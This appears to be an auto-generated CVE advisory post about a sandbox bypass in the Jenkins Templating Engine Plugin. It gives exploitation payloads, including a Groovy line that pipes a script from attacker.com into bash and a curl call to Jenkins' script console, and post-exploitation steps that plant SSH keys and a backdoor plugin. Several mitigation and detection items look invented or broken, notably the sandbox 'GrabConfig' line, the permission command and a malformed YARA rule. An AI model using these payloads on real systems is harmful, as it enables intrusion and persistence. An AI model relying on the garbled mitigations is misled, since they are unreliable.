Listen to this Post
How the CVE Works
The Jenkins Templating Engine Plugin (<= 2.5.3) fails to enforce sandbox restrictions on libraries defined in folders. Attackers with Item/Configure permission can inject malicious Groovy scripts, bypassing sandbox protections. This allows arbitrary code execution on the Jenkins controller JVM, leading to full system compromise. The vulnerability stems from improper access controls when processing library imports, enabling attackers to execute untrusted code in a privileged context.
DailyCVE Form
Platform: Jenkins
Version: <= 2.5.3
Vulnerability: Sandbox bypass
Severity: Critical
Date: 04/29/2025
What Undercode Say:
Exploitation:
1. Payload Injection:
library('malicious_lib') {
def cmd = "curl attacker.com/shell.sh | bash".execute()
}
2. Exploit via API:
curl -X POST -u attacker:password http://jenkins/scriptText --data-urlencode "script=<GROOVY_PAYLOAD>"
Mitigation:
1. Patch Upgrade:
jenkins-plugin-cli --update templating-engine-plugin --version 2.5.4
2. Sandbox Hardening:
@GrabConfig(disableSandbox=false)
3. Access Control:
jenkins-console -s /disable_permission.groovy "Item/Configure"
Detection:
1. Log Analysis:
grep -r "Library loading failed" /var/log/jenkins/
2. YARA Rule:
rule jenkins_sandbox_bypass {
strings: $groovy = "library('.')"
condition: $groovy and jenkins_process
}
Post-Exploit:
1. Lateral Movement:
ssh-keygen -f /tmp/id_rsa -N "" && cat /tmp/id_rsa.pub >> ~/.ssh/authorized_keys
2. Persistence:
Jenkins.instance.pluginManager.install("backdoor-plugin.hpi", false)
References:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
